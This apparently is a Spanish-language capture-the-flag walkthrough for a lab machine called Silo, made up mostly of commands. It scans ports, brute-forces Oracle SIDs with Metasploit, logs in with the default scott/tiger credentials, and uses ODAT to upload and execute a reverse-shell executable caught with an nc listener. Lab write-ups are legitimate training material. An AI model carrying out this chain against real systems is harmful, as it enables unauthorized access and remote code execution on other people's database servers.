nmap -A -p- -oA output 10.129.1.168 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210517131502.png

nmap -sC -sV -O -p- -oA silo 10.129.1.168

nmap -sU -O -p- -oA silo-udp 10.129.1.168

nikto -h 10.129.1.168:80

gobuster dir -k -u http://10.129.1.168/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vemos que tienen una cuenta para guest para smb pero con un _NT_STATUS_ACCOUNT_DISABLED no creo que podamos hacer mucho.

msf6 >use auxiliary/scanner/oracle/tnspoison_checker msf6> show options msf6> set RHOSTS 10.129.1.168 msf6> set THREADS 10 msf6> run

Pasted image 20210517134914.png

msf6 >use auxiliary/scanner/oracle/sid_brute msf6> show options msf6> set RHOSTS 10.129.1.168 msf6> run

Corremos lo anterior para poder ver las instancias de la base de datos de Oracle Tres instancias se encontraron XE,PLSExtProc, y CLREXTPROC

Pasted image 20210517140853.png

msf6 >use auxiliary/scanner/oracle/oracle_login msf6> show options msf6> set RHOSTS 10.129.1.168 msf6> set SID XE msf6> run

Pasted image 20210517140825.png

python3 -m pip install scapy passlib cx_Oracle python-libnmap

python3 /opt/odat-master-python3/odat.py utlfile -s 10.129.1.168 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp silo_reverse_shell.exe silo_reverse_shell.exe

Pasted image 20210517142307.png

python3 /opt/odat-master-python3/odat.py utlfile -s 10.129.1.168 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp silo_reverse_shell.exe silo_reverse_shell.exe --sysdba

Pasted image 20210517143017.png

nc -lvnp 3333

python3 /opt/odat-master-python3/odat.py externaltable -s 10.129.1.168 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp silo_reverse_shell.exe --sysdba

Pasted image 20210517142903.png

Pasted image 20210517143052.png

boxes

copyright©2022 Cu3rv0x all rights reserved